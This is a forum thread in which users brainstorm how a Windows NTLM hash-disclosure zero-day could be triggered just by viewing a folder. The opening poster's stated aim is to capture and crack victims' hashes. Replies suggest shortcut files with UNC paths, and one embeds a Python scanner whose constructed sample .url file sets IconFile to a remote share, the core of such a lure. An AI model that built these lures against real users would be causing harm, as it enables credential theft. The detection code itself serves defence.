Brainstorming Post - Questions for windows NTLM vulnerability
by vvvalentinusss - Wednesday December 11, 2024 at 11:19 AM
#1
Hi talents.

News: https://www.tomshardware.com/tech-industry/cyber-security/zero-day-windows-ntlm-hash-vulnerability-gets-patched-by-third-party-credentials-can-be-hijacked-by-merely-viewing-a-malicious-file-in-file-explorer

Recently 0patch discovered a vuln in Windows NTLM.
According to the description it's very fancy: 0-click, and the user only needs to browse in Windows Explorer, then you are able to get their hash and break it.

The scope is also large: from Win7 till the latest version now.
Since the scope is really large, what I could think of is through an SMB share.
I can't think of any type of file that could do that, like once I open the folder it will auto-trigger and run something.
Anyone, let's brainstorm and think about it?
#2
This is interesting. But I think you missed the part about the "malicious file being present in that folder" or "viewing a file".


" The vulnerability allows an attacker to obtain user's NTLM credentials by simply having the user view a malicious file in Windows Explorer - e.g., by opening a shared folder or USB disk with such file, or viewing the Downloads folder where such file was previously automatically downloaded from attacker's web page. "

original article : https://blog.0patch.com/2024/12/url-file...osure.html



So what could this thing be? Hmmm?

Maybe an .LNK file with a UNC path pointing to a remote server. When a user opens this file it tries to connect to the remote server, which triggers authentication / leaks NTLM.

Or maybe something in the file metadata; while viewing, Explorer might access something from the metadata that could trigger it.


The catch: the blog also mentions this: "or viewing the Downloads folder where such file was previously automatically downloaded from attacker's web page."

Automatically downloaded from the attacker's web page ????


When you open a folder in File Explorer it accesses the files, generates thumbnails, extracts metadata, displays icons. So if someone is able to get NTLM by just opening the folder where a malicious file was downloaded, it has to be because of one of these ways.

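A defender-side check for the hypothesis in this reply (a shortcut file sitting in a folder that carries a UNC path to a remote host, which Explorer may resolve while merely listing the folder). This is an added example, not code from the thread or from 0patch; it assumes .lnk and .url are the shortcut types worth scanning and builds its own constructed sample folder, so it runs offline.

```python
import os
import re
import tempfile

# Shortcut-type files that Explorer parses while listing a folder
# (assumption: .lnk and .url are the types worth checking here).
SHORTCUT_EXTS = {".lnk", ".url"}

# UNC path \\host\share... as plain ASCII text (e.g. inside a .url INI file)
# and as UTF-16LE (how a .lnk stores its strings).
UNC_ASCII = re.compile(rb"\\\\[A-Za-z0-9._-]+\\[^\x00\r\n\"]+")
UNC_UTF16 = re.compile(rb"(?:\\\x00){2}(?:[A-Za-z0-9._-]\x00)+\\\x00(?:[\x20-\x7e]\x00)+")


def unc_refs_in_bytes(data: bytes) -> list[str]:
    """Return every UNC path found in the raw bytes of one file."""
    refs = [m.group(0).decode("ascii", "replace") for m in UNC_ASCII.finditer(data)]
    refs += [m.group(0).decode("utf-16-le", "replace") for m in UNC_UTF16.finditer(data)]
    return refs


def scan_dir(root: str) -> list[tuple[str, str]]:
    """Walk root and report (filename, unc_path) for shortcut files that point at a remote host."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SHORTCUT_EXTS:
                continue
            with open(os.path.join(dirpath, name), "rb") as fh:
                for ref in unc_refs_in_bytes(fh.read()):
                    hits.append((name, ref))
    return hits


def build_sample_dir() -> str:
    """Construct a demo 'Downloads' folder: one suspicious .url and one stand-in .lnk (constructed samples)."""
    root = tempfile.mkdtemp(prefix="ntlm-scan-")
    # A .url file is INI text; IconFile is one field where a remote path can sit.
    with open(os.path.join(root, "invoice.url"), "w", newline="") as fh:
        fh.write("[InternetShortcut]\r\nURL=https://example.test/\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\nIconIndex=0\r\n")
    # Not a real .lnk: a constructed blob carrying a UTF-16LE UNC string the way a real one would.
    with open(os.path.join(root, "report.lnk"), "wb") as fh:
        fh.write(b"L\x00\x00\x00" + "\\\\192.0.2.10\\share\\report.docx".encode("utf-16-le") + b"\x00\x00")
    # Plain text is not a shortcut type, so this one is ignored by the scan.
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("\\\\192.0.2.10\\share\\ mentioned in notes only\n")
    return root


if __name__ == "__main__":
    for name, ref in scan_dir(build_sample_dir()):
        print(f"{name}: references {ref}")
```

Run it over a real Downloads folder or share by passing that path to scan_dir instead of the constructed sample directory.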
#3
(12-17-2024, 09:30 AM)Aanya Wrote: This is interesting. But I think you missed the part about the "malicious file being present in that folder" or "viewing a file".

It's a very good reply mate, insightful.

Just my 2 cents here: I had the same thought from the beginning about the point that "viewing" means simply looking but not accessing. If it's an LNK file, that's way simpler to think about. I can't imagine someone "viewing" a dir and seeing something within, and then the endpoint gets compromised. I went in a wrong direction, investigating if there's any way like a shared network folder, the SMB part.
#4
Were you able to figure it out? I totally forgot about it lol